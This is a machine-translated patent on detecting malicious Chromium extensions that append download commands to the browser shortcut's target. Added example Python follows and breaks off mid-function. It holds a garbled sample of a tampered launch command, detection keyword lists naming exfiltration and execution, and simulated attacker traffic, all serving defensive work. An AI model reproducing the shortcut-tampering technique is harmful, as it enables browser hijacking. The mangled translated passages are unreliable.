CN117077138B - Anomaly detection method, system, medium and equipment based on browser

Info

Publication number: CN117077138B
Application number: CN202311056058.3A
Authority: CN (China)
Prior art keywords: character string, browser, target, abnormal, extension program
Legal status: Active
Other languages: Chinese (zh)
Other versions: CN117077138A
Inventors: 郭洪亮, 张慧云, 高喜宝
Current assignee: Beijing Antiy Network Technology Co Ltd
Original assignee: Beijing Antiy Network Technology Co Ltd
Application filed by Beijing Antiy Network Technology Co Ltd; priority to CN202311056058.3A; published as CN117077138A; granted and published as CN117077138B
Classifications

    • G06F21/56 Computer malware detection or handling, e.g. anti-virus arrangements (under G06F21/00 Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity; G06F21/50 Monitoring users, programs or devices to maintain the integrity of platforms; G06F21/55 Detecting local intrusion or implementing counter-measures)
    • G06F16/90344 Query processing by using string matching techniques (under G06F16/00 Information retrieval; G06F16/90 Details of database functions independent of the retrieved data types; G06F16/903 Querying; G06F16/90335 Query processing)
    • G06F16/9558 Details of hyperlinks; Management of linked annotations (under G06F16/95 Retrieval from the web; G06F16/955 Retrieval from the web using information identifiers, e.g. uniform resource locators [URL])

Abstract

The present invention relates to the field of network security detection, and in particular to a browser-based anomaly detection method, system, medium and device. The method comprises the following steps: obtaining the target address linked to the shortcut file of the browser to be tested; acquiring the target character string; if character strings other than the preset character strings exist in the target character string, taking those other character strings as the anomaly judgment character string; and performing anomaly locating processing on the plurality of extension programs according to the anomaly judgment character string to determine the abnormal extension program. By matching the character strings included in the target address, the invention can rapidly determine whether an abnormal extension program exists in the browser to be tested and whether the browser has been infected or attacked, and the abnormal extension program is accurately located so that it can be cleared in time.

Description

Anomaly detection method, system, medium and equipment based on browser
Technical Field
The present invention relates to the field of network security detection, and in particular, to a browser-based anomaly detection method, system, medium, and device.
Background
In the field of computer security, malware detection techniques are the various techniques used to detect malware in a computer system. Detection of malicious browser extension programs is an important research direction in this field. A malicious browser extension is software that infects a user's computer in the form of a browser plug-in or extension and then performs various malicious acts.
Currently, detection of malicious browser extensions still faces a series of technical challenges. For example, a malicious extension program may be hidden in the plug-in or extension list of a Chromium browser; when the browser starts the corresponding plug-in, the malicious extension program is activated and carries out its attack behavior. Typically, to increase concealment, the code of the malicious program is small and usually consists of a few instructions that modify the launch command of the Chromium browser, such as instructions that add a malicious resource download link to the browser's launch target. The downloaded malicious resources can then exploit vulnerabilities or security holes of the browser to attack and infect the user's computer.
Because the hiding place of the malicious extension program is concealed and the operations it performs are subtle and fine-grained, a malicious extension program of this form is difficult for a user to discover and difficult to clear in time.
Disclosure of Invention
Aiming at the technical problem that the hiding place of the malicious extension program is concealed and the operations it performs are subtle and fine-grained, so that a malicious extension program of this form is difficult for a user to discover and to clear in time, the invention adopts the following technical scheme:
According to one aspect of the present invention, there is provided a browser-based anomaly detection method, the method comprising the following steps:
obtaining the target address linked to the shortcut file of the browser to be tested; the browser to be tested is a browser developed based on the Chromium browser, and a plurality of extension programs are installed in it;
acquiring a target character string, which is the character string after the last preset separator in the target address;
if character strings other than the preset character strings exist in the target character string, taking those other character strings as the anomaly judgment character string;
and performing anomaly locating processing on the plurality of extension programs according to the anomaly judgment character string, and determining the abnormal extension program.
The anomaly judgment character string is a character string corresponding to a resource download instruction;
the anomaly locating processing comprises:
acquiring the resource file of each extension program; the resource file comprises the main function file and the sub-function files corresponding to the extension program;
matching the anomaly judgment character string against the character strings in the resource file of each extension program respectively;
if the matching succeeds, determining that the extension program corresponding to the successfully matched resource file is an abnormal extension program;
after determining the abnormal extension program, the method further comprises:
running the abnormal extension program again in a sandbox, and obtaining the resource information corresponding to the resources downloaded during the run;
performing anomaly detection on the target terminal according to the resource information; the target terminal is a terminal on which the browser to be tested is installed.
Further, after obtaining the target address linked to the shortcut file of the browser to be tested, the method further comprises:
if only the preset character string exists in the target character string, sequentially performing static detection and dynamic detection of security vulnerabilities on each extension program to generate a security detection result for each extension program;
and determining the abnormal extension program according to the security detection result of each extension program.
Further, obtaining the target address linked to the shortcut file of the browser to be tested comprises:
decoding the shortcut file of the browser to be tested to generate the hexadecimal file encoding corresponding to the shortcut file;
and obtaining the target address from a preset encoding region in the hexadecimal file encoding.
Further, before taking the other character strings as the anomaly judgment character string when character strings other than the preset character strings exist in the target character string, the method further comprises:
acquiring the character string after the last preset separator in the target address as the target character string;
acquiring the total number of characters $K_1$ in the target character string;
acquiring the total number of characters $A_1, A_2, \dots, A_i, \dots, A_Z$ contained in each preset character string, where $A_i$ is the total number of characters contained in the $i$-th preset character string, $Z$ is the total number of preset character strings, and $i = 1, 2, \dots, Z$;
if $\max(A_1, A_2, \dots, A_i, \dots, A_Z) \le K_1$, comparing each preset character string with the target character string.
Further, after determining the abnormal extension program, the method further comprises:
acquiring a plurality of acquisition terminals; each acquisition terminal is provided with an acquisition browser developed based on the Chromium browser, and each acquisition browser contains only one abnormal extension program;
acquiring the port state vector and the port behavior set collected by each acquisition terminal; where $B_j$ is the port state vector collected by the $j$-th acquisition terminal, $B_j = (B_j^1, B_j^2, \dots, B_j^n, \dots, B_j^y)$, $B_j^n$ is the state value of the $n$-th port in the $j$-th acquisition terminal, $y$ is the number of ports in each acquisition terminal, and $n = 1, 2, \dots, y$; $C_j$ is the port behavior set collected by the $j$-th acquisition terminal, $C_j = (C_j^1, C_j^2, \dots, C_j^n, \dots, C_j^y)$, $C_j^n$ is the behavior feature vector corresponding to the $n$-th port in the $j$-th acquisition terminal, $C_j^n = (C_j^{n1}, C_j^{n2}, \dots, C_j^{nm}, \dots, C_j^{nx})$; where $C_j^{nm}$ is the number of times instructions of the $m$-th preset instruction type appear in one abnormal behavior collected by the $n$-th port of the $j$-th acquisition terminal, $x$ is the total number of preset instruction types, and $m = 1, 2, \dots, x$;
clustering all port state vectors to generate a plurality of cluster groups;
obtaining the center vector corresponding to each cluster group;
adding the port behavior sets corresponding to all port state vectors included in each cluster group into the corresponding feature set, generating the abnormal behavior feature set corresponding to each cluster group;
and generating the judgment sample set corresponding to each abnormal extension program according to the center vector and the abnormal behavior feature set corresponding to each cluster group.
Further, obtaining the port state vector collected by each acquisition terminal comprises:
acquiring the state value of each port of the acquisition terminal in one acquisition period; the acquisition period is the period corresponding to the completion of one abnormal behavior of the abnormal extension program;
if the port is in the open state at any time during the acquisition period, configuring the first state value for the port;
if the port remains in the closed state throughout the acquisition period, configuring the second state value for the port.
According to a second aspect of the present invention, there is provided a browser-based anomaly detection apparatus, the apparatus comprising:
an address acquisition module, used for acquiring the target address linked to the shortcut file of the browser to be tested; the browser to be tested is a browser developed based on the Chromium browser, and a plurality of extension programs are installed in it;
a character string acquisition module, used for acquiring the target character string, which is the character string after the last preset separator in the target address;
an anomaly judgment module, used for taking the character strings other than the preset character strings in the target character string as the anomaly judgment character string, if such other character strings exist;
an anomaly locating module, used for performing anomaly locating processing on the plurality of extension programs according to the anomaly judgment character string to determine the abnormal extension program;
the anomaly judgment character string is a character string corresponding to a resource download instruction;
the anomaly locating processing comprises the following steps:
acquiring the resource file of each extension program; the resource file comprises the main function file and the sub-function files corresponding to the extension program;
matching the anomaly judgment character string against the character strings in the resource files of each extension program respectively;
if the matching succeeds, determining that the extension program corresponding to the successfully matched resource file is an abnormal extension program;
after determining the abnormal extension program, the method further comprises:
running the abnormal extension program again in a sandbox, and obtaining the resource information corresponding to the resources downloaded during the run;
performing anomaly detection on the target terminal according to the resource information; the target terminal is a terminal on which the browser to be tested is installed.
According to a third aspect of the present invention, there is provided a non-transitory computer-readable storage medium storing a computer program which, when executed by a processor, implements a browser-based anomaly detection method as described above.
According to a fourth aspect of the present invention, there is provided an electronic device comprising a memory, a processor and a computer program stored in the memory and executable on the processor, the processor implementing a browser-based anomaly detection method as described above when executing the computer program.
The invention has at least the following beneficial effects:
An abnormal extension program generally modifies the launch instruction of the browser to be tested to add a corresponding malicious instruction, so that the target address linked to the shortcut file (lnk file) of the browser to be tested is changed; specifically, the malicious instruction is appended to the original target address, so that each time the shortcut file is opened, the browser to be tested is opened and the malicious instruction is executed at the same time. By matching the character strings included in the target address, the invention can rapidly determine whether an abnormal extension program exists in the browser to be tested and whether the browser has already been infected and attacked.
In addition, since the abnormal extension program is an originally normal extension program into which an instruction for modifying the target address linked to the lnk file has been inserted, the content corresponding to the anomaly judgment character string must exist in the resource file of the abnormal extension program. Based on this feature, the anomaly locating processing of the invention can quickly determine which extension program (plug-in) is the abnormal one. Thus the technical scheme can rapidly determine whether an abnormal extension program exists in the browser to be tested and accurately locate it so that it can be cleared in time.
Drawings
In order to more clearly illustrate the technical solutions of the embodiments of the present invention, the drawings required for the description of the embodiments will be briefly described below, and it is apparent that the drawings in the following description are only some embodiments of the present invention, and other drawings may be obtained according to these drawings without inventive effort for a person skilled in the art.
FIG. 1 is a flowchart of a browser-based anomaly detection method according to an embodiment of the present invention;
fig. 2 is a block diagram of an abnormality detection apparatus based on a browser according to another embodiment of the present invention.
Detailed Description
The following description of the embodiments of the present invention will be made clearly and completely with reference to the accompanying drawings, in which it is apparent that the embodiments described are only some embodiments of the present invention, but not all embodiments. All other embodiments, which can be made by those skilled in the art based on the embodiments of the invention without making any inventive effort, are intended to fall within the scope of the invention.
According to a first aspect of the present invention, as shown in FIG. 1, there is provided a browser-based anomaly detection method for determining an abnormal extension program, the method comprising the following steps:
Step 100: obtaining the target address linked to the shortcut file of the browser to be tested.
The browser to be tested is a browser developed based on the Chromium browser, and a plurality of extension programs are installed in it.
The currently discovered viruses are deployed in plug-ins (extension programs) of the Chromium browser and modify the lnk files of the Chromium browser. Therefore, the technical scheme of this embodiment can be applied to any browser developed on the existing Chromium kernel; that is, the browser to be tested may be an existing Opera browser, Edge browser, or *** browser.
Further, step 100 comprises:
Step 101: decoding the shortcut file of the browser to be tested with a hexadecimal editor, generating the hexadecimal file encoding corresponding to the shortcut file.
Specifically, the hexadecimal editor in this embodiment may be 010 Editor.
Step 102: obtaining the target address from a preset encoding region in the hexadecimal file encoding.
After the lnk file is opened with 010 Editor, the corresponding hexadecimal file encoding is generated and divided into several sections, and different contents of the lnk file correspond to the hexadecimal encoding of different sections. Specifically, the target address in the lnk file corresponds to the hexadecimal encoding in the second section, so the character string of the target address can be read from the hexadecimal encoding of the second section. The second section is the second divided encoding section of the hexadecimal file encoding that 010 Editor generates for the lnk file. Naturally, if another hexadecimal editor is used, the hexadecimal encoding section corresponding to the target address in the lnk file has to be located accordingly.
Step 200: acquiring the target character string, which is the character string after the last preset separator in the target address.
For example, in the target address "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe", the character string after the last separator "\" is "msedge.exe", which is the target character string.
In one aspect, after step 200, the method further comprises:
Step 300: if character strings other than the preset character strings exist in the target character string, taking those other character strings as the anomaly judgment character string.
The character string of a normal target address consists of the storage directory of the start file and the start file name, such as "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe". When the target address is maliciously modified, it takes the form of the original target address with a corresponding instruction appended after it, such as "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" followed by the appended instruction.
These features show that the only difference between the target address before and after malicious tampering is the character string after the last preset separator, i.e. the target character string. In addition, the start file names of the existing browsers developed on the Chromium kernel can be determined in advance, so the preset character strings can be collected from the start file names of the existing target browsers: for example, the start file name of the Opera browser is the launcher, that of the Edge browser is msedge.exe, and that of the *** browser is chrome. Once all the preset character strings have been collected, they can be used for the anomaly judgment in step 300.
Further, before step 300, the method further comprises:
Step 301: acquiring the character string after the last preset separator in the target address as the target character string.
Step 302: acquiring the total number of characters $K_1$ in the target character string.
Step 303: acquiring the total number of characters $A_1, A_2, \dots, A_i, \dots, A_Z$ contained in each preset character string, where $A_i$ is the total number of characters contained in the $i$-th preset character string, $Z$ is the total number of preset character strings, and $i = 1, 2, \dots, Z$.
Step 304: if $\max(A_1, A_2, \dots, A_i, \dots, A_Z) \le K_1$, comparing each preset character string with the target character string.
Specifically, the comparison is carried out according to the following steps:
Step 314: determining a target matching interval in the target character string. The length of the target matching interval equals the length of the corresponding preset character string, and its starting position is the first character of the target character string.
Step 324: comparing the preset character string with the character string in the corresponding target matching interval.
Typically, when the target address is maliciously modified, it takes the form of the original target address with a corresponding instruction appended after it, such as "C \windows\system 32\msedge/exe/V/Csetx 4OAGWfxlEs02z6 nnukk=2whttpr 0& setL1U03Hm UO6B9 icurrcnnlo 4=. Com =. Com &/br/flashplayer/". Since the number of characters in the appended instruction is usually far larger than the number of characters in the start file name, a preliminary anomaly judgment based on the character-count comparison of steps 301-304 can quickly identify a modified target address before step 300 is carried out.
On the other hand, after step 200, the method further comprises:
Step 310: if only the preset character string exists in the target character string, performing static detection and dynamic detection of security vulnerabilities on each extension program in turn, generating a security detection result for each extension program.
Step 320: determining the abnormal extension program according to the security detection result of each extension program.
In this scheme, if the target address has not been maliciously tampered with, security detection of the extension programs can still be carried out in turn through existing static and dynamic vulnerability detection, so that whether an extension program is infected by a virus can be determined more accurately.
Step 400: performing anomaly locating processing on the plurality of extension programs according to the anomaly judgment character string, and determining the abnormal extension program.
The anomaly locating processing comprises:
Step 401: acquiring the resource file of each extension program. The resource file comprises the main function file and the sub-function files corresponding to the extension program.
Specifically, after the developer mode of the browser to be tested is enabled, the file ID of the installation file of each plug-in (extension program) installed in the browser can be obtained. The installation file of each plug-in can then be found on the corresponding terminal through its file ID; the installation file includes the corresponding resource files, where the main function file is the file with the suffix .json and the sub-function files are the files with the suffix .js.
Step 402: matching the anomaly judgment character string against the character strings in the resource files of each extension program respectively.
Step 403: if the matching succeeds, determining that the extension program corresponding to the successfully matched resource file is an abnormal extension program.
Because the abnormal extension program is an originally normal extension program into which an instruction for modifying the target address linked to the lnk file has been inserted, and that modification instruction necessarily includes the appended content, such as the character string corresponding to the download instruction, the content corresponding to the anomaly judgment character string is necessarily present in the resource file of the abnormal extension program. Based on this feature, the anomaly locating processing of the invention can quickly determine which extension program (plug-in) is the abnormal one; thus the scheme can rapidly determine whether an abnormal extension program exists in the browser to be tested and accurately locate it so that it can be cleared in time.
As another possible embodiment of the present invention, the anomaly judgment character string is the character string corresponding to a resource download instruction.
After determining the abnormal extension program, the method further comprises:
Step 500: running the abnormal extension program again in a sandbox, and acquiring the resource information corresponding to the resources downloaded during the run.
Step 600: performing anomaly detection on the target terminal according to the resource information. The target terminal is a terminal on which the browser to be tested is installed.
If the anomaly judgment character string is the character string corresponding to a resource download instruction, the download instruction is executed at the same time as the browser to be tested is started, and the corresponding virus is downloaded from the corresponding IP address. Therefore, by running the abnormal extension program again in a sandbox, the data packets exchanged while the virus is downloaded can be captured during the run, and further resource information such as the destination IP, communication port number, communication protocol and virus code can be obtained. The existing virus feature library can be updated with this information, and other target terminals can be checked for anomalies according to these features.
Because the virus file that causes the abnormal behavior in the invention is downloaded by the abnormal extension program in the Chromium browser, this attack mode is concealed and unusual, and the prior art lacks judgment features for this attack behavior, so the attack cannot be judged in a timely and accurate way. As another possible embodiment of the present invention, after determining the abnormal extension program, the method further comprises:
Step 410: a plurality of acquisition terminals are acquired. Each acquisition terminal is respectively provided with an acquisition browser developed based on a Chromium browser, and one acquisition browser only comprises an abnormal extension program. Each acquisition terminal is configured with a port information acquisition instruction for acquiring port state information and port received instruction information.
Specifically, in order to ensure the comprehensiveness of the finally obtained abnormal behavior characteristics, when the acquisition terminal is set, a plurality of acquisition browsers can be obtained, a plurality of known abnormal extension programs are covered in the plurality of acquisition browsers, and the plurality of acquisition browsers with the same abnormal extension program are respectively deployed on different acquisition terminals, so that the behavior characteristics of different abnormal extension programs can be acquired, and the behavior characteristics of each abnormal extension program in different acquisition browsers can also be all acquired.
Step 420: and acquiring a port state vector and a port behavior set acquired by each acquisition terminal. Wherein B is j For the port state vector acquired by the jth acquisition terminal, B j =(B j 1 、B j 2 、…、B j n 、…、B j y ),B j n And y is the number of ports in each acquisition terminal, and n=1, 2, … and y. Wherein C is j C, for the port behavior set acquired by the j-th acquisition terminal j =(C j 1 、C j 2 、…、C j n 、…、C j y ),C j n And the behavior feature vector corresponding to the nth port in the jth acquisition terminal. C (C) j n =(C j n1 、C j n2 、…、C j nm 、…、C j nx ) Wherein C j nm For the number of the m preset instruction types in the abnormal behavior acquired by the nth port in the jth acquisition terminal, x is the total number of the preset instruction types, and m=1, 2, … and x.
Specifically, obtaining the port state vector collected by each collection terminal includes:
step 421: and acquiring the state value of each port in one acquisition period by using the port information acquisition instruction. The acquisition period is a period corresponding to the abnormal behavior of the abnormal extension program.
Specifically, the existing security analysis software may be used to determine each corresponding acquisition period according to the acquired port information. And each corresponding acquisition period can be determined manually according to the acquired port information.
Step 422: if the port is in an open state in one acquisition period, a first state value is configured for the port.
Step 423: if the port is always in the closed state in one acquisition period, a second state value is configured for the port.
Specifically, the first state value may be set to 0 and the second state value may be set to 1. If, in this embodiment, 50 ports of the acquisition terminal are designated as ports to be monitored, the final port state vector is a 50-dimensional vector whose elements are only 0 or 1.
Specifically, acquiring a port behavior set acquired by each acquisition terminal includes:
step 424: and acquiring instruction information sent by the target IP address received by each port in one acquisition period by using the port information acquisition instruction.
When the infected terminal is attacked (for example when related data is stolen), the malicious terminal corresponding to the target IP address communicates with it several times and issues data transmission instructions or other instructions. Therefore, while each abnormal behavior is executed, the corresponding port on the acquisition terminal receives the corresponding instruction information.
Step 425: and determining the preset instruction type corresponding to each instruction according to the instruction information.
Further, step 425 includes:
step 4251: and obtaining an instruction mapping table, wherein the instruction mapping table comprises a corresponding relation between each preset instruction type and an instruction keyword.
Specifically, the keywords corresponding to each instruction can be extracted according to the collected data of each abnormal extension program in the actual scene, so that the corresponding instruction mapping table can be obtained.
Step 4252: and acquiring a preset instruction type corresponding to each instruction according to the instruction information and the instruction mapping table.
Step 426: and determining the occurrence times of each preset instruction type according to all acquired instruction information.
According to the instruction mapping table, the number of times each preset instruction type occurs at each port in one sampling period can be counted, and the behavior feature vector corresponding to the port is formed from these counts. If there are 10 preset instruction types, the behavior feature vector of each port is a 10-dimensional vector, each element of which is a natural number giving the number of occurrences of the corresponding instruction type.
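The feature construction of steps 420 to 426, as an added example that is not code from the patent: the port state vector $B_j$ (0 for a port opened during the period, 1 for a port that stayed closed) and the port behavior set $C_j$ (per port, the count of instructions of each preset type received from the target IP address) are built from constructed port events of one acquisition terminal. The monitored port list, the instruction mapping table, the target IP address and the sample events are assumptions made for illustration.

```python
# Added example (not code from the patent): constructing the port state vector
# B_j and the port behavior set C_j of one acquisition terminal (steps 420-426)
# from constructed port events.  The monitored port list, the instruction
# mapping table and the sample events are all assumptions made for illustration.
from collections import Counter
from dataclasses import dataclass

# State values as in the description: first value 0 for a port that was open at
# some point in the acquisition period, second value 1 for a port that stayed closed.
OPEN_STATE, CLOSED_STATE = 0, 1

# Assumed monitored ports (the patent uses y ports, 50 in its example).
MONITORED_PORTS = (21, 22, 80, 443, 4444, 8080)

# Assumed instruction mapping table (step 4251): preset instruction type -> keywords.
# The patent derives the keywords from real captures of each abnormal extension;
# these keywords are constructed for the example.
INSTRUCTION_MAP = {
    "download": ("DOWNLOAD", "FETCH", "GET_FILE"),
    "upload": ("UPLOAD", "PUT_FILE", "EXFIL"),
    "execute": ("EXEC", "RUN", "SPAWN"),
    "beacon": ("PING", "HEARTBEAT", "CHECKIN"),
}
INSTRUCTION_TYPES = tuple(INSTRUCTION_MAP)  # fixed order gives the index m


@dataclass(frozen=True)
class PortEvent:
    t: float           # seconds since the start of the acquisition period
    port: int
    kind: str          # "open", "close" or "recv"
    src: str = ""      # source IP address of a "recv" event
    payload: str = ""  # instruction text carried by a "recv" event


def port_state_vector(events, ports=MONITORED_PORTS):
    """Steps 421-423: B_j, one state value per monitored port for one period."""
    opened = {e.port for e in events if e.kind == "open"}
    return [OPEN_STATE if p in opened else CLOSED_STATE for p in ports]


def instruction_type(payload, mapping=INSTRUCTION_MAP):
    """Step 4252: map raw instruction text to a preset instruction type by
    keyword lookup; None when no keyword matches (the instruction is not counted)."""
    text = payload.upper()
    for itype, keywords in mapping.items():
        if any(k in text for k in keywords):
            return itype
    return None


def port_behavior_set(events, target_ip, ports=MONITORED_PORTS):
    """Steps 424-426: C_j, for every port the per-type count of instructions
    received from the target IP address in this period.  Traffic from any other
    address is ignored, since only the malicious terminal's instructions count."""
    counts = {p: Counter() for p in ports}
    for e in events:
        if e.kind != "recv" or e.src != target_ip or e.port not in counts:
            continue
        itype = instruction_type(e.payload)
        if itype is not None:
            counts[e.port][itype] += 1
    return [[counts[p][t] for t in INSTRUCTION_TYPES] for p in ports]


# Constructed events for one acquisition period on one terminal; 203.0.113.7 is
# the assumed target (malicious) IP address, 198.51.100.9 an unrelated peer.
SAMPLE_EVENTS = [
    PortEvent(0.0, 443, "open"),
    PortEvent(0.5, 4444, "open"),
    PortEvent(1.0, 4444, "recv", "203.0.113.7", "CHECKIN id=17"),
    PortEvent(2.0, 4444, "recv", "203.0.113.7", "DOWNLOAD payload.bin"),
    PortEvent(2.5, 4444, "recv", "203.0.113.7", "EXEC payload.bin"),
    PortEvent(3.0, 4444, "recv", "203.0.113.7", "UPLOAD cookies.db"),
    PortEvent(3.1, 4444, "recv", "203.0.113.7", "UPLOAD history.db"),
    PortEvent(4.0, 443, "recv", "198.51.100.9", "DOWNLOAD update.json"),
    PortEvent(4.5, 4444, "recv", "203.0.113.7", "NOISE xyz"),
    PortEvent(5.0, 4444, "close"),
]

if __name__ == "__main__":
    print("B_j =", port_state_vector(SAMPLE_EVENTS))
    for port, row in zip(MONITORED_PORTS, port_behavior_set(SAMPLE_EVENTS, "203.0.113.7")):
        print(f"C_j^{port} =", dict(zip(INSTRUCTION_TYPES, row)))
```

For the constructed events the state vector is `[1, 1, 1, 0, 0, 1]` (ports 443 and 4444 opened) and the row for port 4444 is `[1, 2, 1, 1]`; the download instruction on port 443 is not counted because it did not come from the target IP address, and the instruction without any mapped keyword is dropped rather than forced into a type. Keyword matching is substring based, so the mapping table has to be reviewed for keywords that are substrings of one another.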
Step 430: clustering all port state vectors to generate a plurality of cluster groups.
Specifically, the clustering can be performed with the K-means clustering algorithm, and the number of cluster groups is configured to equal the number of types of abnormal extension programs included in the acquisition terminals.
Step 440: and obtaining a center vector corresponding to each cluster group.
Step 450: and respectively adding port behavior sets corresponding to all the port state vectors included in each cluster group into the corresponding feature set to generate an abnormal behavior feature set corresponding to each cluster group.
Step 460: generating the judgment feature set corresponding to each abnormal extension program according to the center vector and the abnormal behavior feature set corresponding to each cluster group.
In this embodiment, because each abnormal extension program must communicate over essentially the same ports when performing its abnormal behavior, clustering the port state vectors amounts to clustering the abnormal extension programs themselves. At the same time, the same abnormal extension program deployed in different acquisition browsers may perform somewhat different operations when carrying out its abnormal behavior, so the port behavior sets corresponding to the same abnormal extension program also differ to some extent. The port behavior sets corresponding to all port state vectors in each cluster group are therefore added to the corresponding feature set, so that the abnormal behavior feature set finally generated for each abnormal extension program covers every kind of operation behavior more comprehensively, which in turn improves the accuracy of the judgment feature set.
Further, step 460 includes:
step 461: and obtaining an exception label of the exception extension program.
Specifically, the virus name corresponding to the exception extension program may be used as the corresponding exception tag.
Step 462: combining the center vector of the cluster group corresponding to the abnormal extension program with each port behavior set in that cluster group to form a plurality of primary judgment features corresponding to the abnormal extension program.
Step 463: the anomaly tags are used as decision tags for each primary decision feature.
After the processing of steps 461 to 463, a plurality of virus judgment features corresponding to the same virus attack are generated, so a large number of virus judgment features for the virus corresponding to each abnormal extension program can be produced in this way. These virus judgment features can be used to train an existing neural network model into a model with virus judgment capability, so that virus judgment work can later be performed more quickly and efficiently.
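Steps 430 to 463 carried through on constructed data, as an added example that is not code from the patent: a pure-Python K-means clusters the port state vectors of nine acquisition terminals (three abnormal extension programs, each deployed in three acquisition browsers), the center vector of each cluster group is taken, the port behavior sets of the group's members are pooled, and every (center vector, port behavior set) pair is labelled with the virus name. The port list, the terminal records, the virus names and the majority-vote rule that attaches an extension's label to a cluster group are assumptions; the patent states only that the virus name is used as the label.

```python
# Added example (not code from the patent): steps 430 to 463 on constructed data.
# A pure-Python k-means clusters the binary port state vectors B_j of several
# acquisition terminals, the centre vector of each cluster is taken, the port
# behavior sets C_j of the cluster members are pooled, and each (centre, C_j)
# pair is labelled with the virus name.  The port list, the terminal records,
# the majority-vote labelling of a cluster and the virus names are assumptions.
from collections import Counter
from dataclasses import dataclass

PORTS = (21, 22, 80, 443, 4444, 6667, 8080, 9001)                # y = 8 monitored ports
INSTRUCTION_TYPES = ("download", "upload", "execute", "beacon")  # x = 4 preset types


@dataclass(frozen=True)
class TerminalRecord:
    extension: str   # abnormal extension deployed in this acquisition browser
    state: tuple     # B_j: 0 = port opened in the period, 1 = stayed closed
    behavior: tuple  # C_j: y rows of x instruction-type counts


def state(*open_ports):
    return tuple(0 if p in open_ports else 1 for p in PORTS)


def behavior(rows):
    """Build C_j from {port: [counts per type]}; unlisted ports saw no instructions."""
    zero = (0,) * len(INSTRUCTION_TYPES)
    return tuple(tuple(rows.get(p, zero)) for p in PORTS)


def sq_dist(a, b):
    return sum((x - y) ** 2 for x, y in zip(a, b))


def farthest_first_init(vectors, k):
    """Deterministic seeding: start at the first vector, then repeatedly add the
    vector farthest from all centres chosen so far."""
    centers = [list(vectors[0])]
    while len(centers) < k:
        far = max(vectors, key=lambda v: min(sq_dist(v, c) for c in centers))
        centers.append(list(far))
    return centers


def kmeans(vectors, k, max_iter=100):
    """Lloyd's k-means (step 430).  Returns (assignment, centres); for 0/1 inputs
    each centre coordinate is the fraction of members with that port closed."""
    centers = farthest_first_init(vectors, k)
    assign = None
    for _ in range(max_iter):
        new_assign = [min(range(k), key=lambda c: sq_dist(v, centers[c])) for v in vectors]
        if new_assign == assign:
            break
        assign = new_assign
        for c in range(k):
            members = [v for v, a in zip(vectors, assign) if a == c]
            if members:  # an empty cluster keeps its previous centre
                centers[c] = [sum(col) / len(members) for col in zip(*members)]
    return assign, centers


def build_decision_features(records, virus_names):
    """Steps 440-463: centre vector per cluster, pooled behavior sets per cluster,
    and one labelled primary decision feature per (centre, C_j) pair."""
    k = len({r.extension for r in records})  # one cluster per abnormal extension type
    assign, centers = kmeans([r.state for r in records], k)
    features = []
    for c in range(k):
        members = [r for r, a in zip(records, assign) if a == c]
        if not members:
            continue
        # Assumption: the cluster takes the virus name of the extension deployed on
        # the majority of its members (the patent only says the virus name is the tag).
        ext = Counter(r.extension for r in members).most_common(1)[0][0]
        for r in members:
            features.append({"center": centers[c], "behavior": r.behavior,
                             "label": virus_names[ext]})
    return features


# Constructed records: three abnormal extensions, each deployed in three
# acquisition browsers, with small differences between browsers.
RECORDS = [
    TerminalRecord("ext-A", state(4444, 8080), behavior({4444: [1, 2, 1, 1], 8080: [0, 0, 0, 3]})),
    TerminalRecord("ext-A", state(4444, 8080, 80), behavior({4444: [2, 1, 1, 1], 8080: [0, 0, 0, 2]})),
    TerminalRecord("ext-A", state(4444, 8080), behavior({4444: [1, 3, 1, 2]})),
    TerminalRecord("ext-B", state(443, 6667), behavior({6667: [0, 0, 1, 4]})),
    TerminalRecord("ext-B", state(443, 6667), behavior({6667: [0, 1, 1, 4], 443: [1, 0, 0, 0]})),
    TerminalRecord("ext-B", state(443, 6667, 9001), behavior({6667: [0, 0, 2, 3]})),
    TerminalRecord("ext-C", state(21, 22), behavior({21: [0, 4, 0, 0]})),
    TerminalRecord("ext-C", state(21, 22), behavior({21: [0, 3, 0, 1], 22: [0, 0, 1, 0]})),
    TerminalRecord("ext-C", state(21, 22, 80), behavior({21: [1, 2, 0, 0]})),
]
VIRUS_NAMES = {"ext-A": "Trojan.Example.A", "ext-B": "Trojan.Example.B",
               "ext-C": "Trojan.Example.C"}

if __name__ == "__main__":
    for f in build_decision_features(RECORDS, VIRUS_NAMES):
        print(f["label"], [round(v, 2) for v in f["center"]], f["behavior"][4])
```

With these records the three extensions land in three separate cluster groups and nine labelled primary judgment features are produced, three per virus name, each carrying its group's center vector together with one member's port behavior set. The center vector is the per-port mean, so a port that only some browsers opened shows up as a fraction (port 80 for ext-A is 2/3). The farthest-first seeding is used so the result is reproducible; with random seeding K-means can split one extension's vectors across two groups when the configured number of groups does not match the number of extension types actually present, which is worth checking before the features are used for training.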
According to a second aspect of the present invention, as shown in fig. 2, there is also provided a browser-based abnormality detection apparatus including:
the address acquisition module is used for acquiring a target address linked with the shortcut file of the browser to be tested; the browser to be tested is a browser developed based on a Chromium browser, and a plurality of extension programs are installed in the browser to be tested;
the character acquisition module is used for obtaining a target character string, wherein the target character string is the character string after the last preset separator in the target address;
the abnormality judging module is used for taking other character strings as abnormality judging character strings if other character strings exist in the target character strings except the preset character strings;
and the abnormality positioning module is used for performing abnormality positioning processing on the plurality of extension programs according to the abnormality judgment character string to determine the abnormal extension program.
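The check performed by the address acquisition, character acquisition, abnormality judgment and abnormality positioning modules (claims 1, 3 and 4), as an added example that is not code from the patent, on constructed input. The backslash as preset separator, the preset strings `chrome.exe` and `msedge.exe`, the browser shortcut target and the extension resource files are all assumptions made for illustration; decoding the shortcut file itself (claim 2) is not shown, so the example starts from an already extracted target address.

```python
# Added example (not code from the patent): the shortcut-target check of the
# address acquisition, character acquisition, abnormality judgment and
# abnormality positioning modules (claims 1, 3 and 4), on constructed input.
# The backslash as preset separator, the preset strings, the browser target
# and the extension resource files are all assumptions made for illustration;
# decoding the .lnk file itself (claim 2) is not shown, the example starts
# from the already extracted target address.
PRESET_SEPARATOR = "\\"
# Assumed preset strings: the legitimate tails of a Chromium-based browser target.
PRESET_STRINGS = ("chrome.exe", "msedge.exe")


def target_string(target_address, separator=PRESET_SEPARATOR):
    """Character acquisition: the substring after the last preset separator."""
    return target_address.rsplit(separator, 1)[-1]


def judge(target, presets=PRESET_STRINGS):
    """Abnormality judgment (claims 3 and 4).  Returns (status, anomaly_string):
    ("preset_only", None)          - the target string is exactly a preset string;
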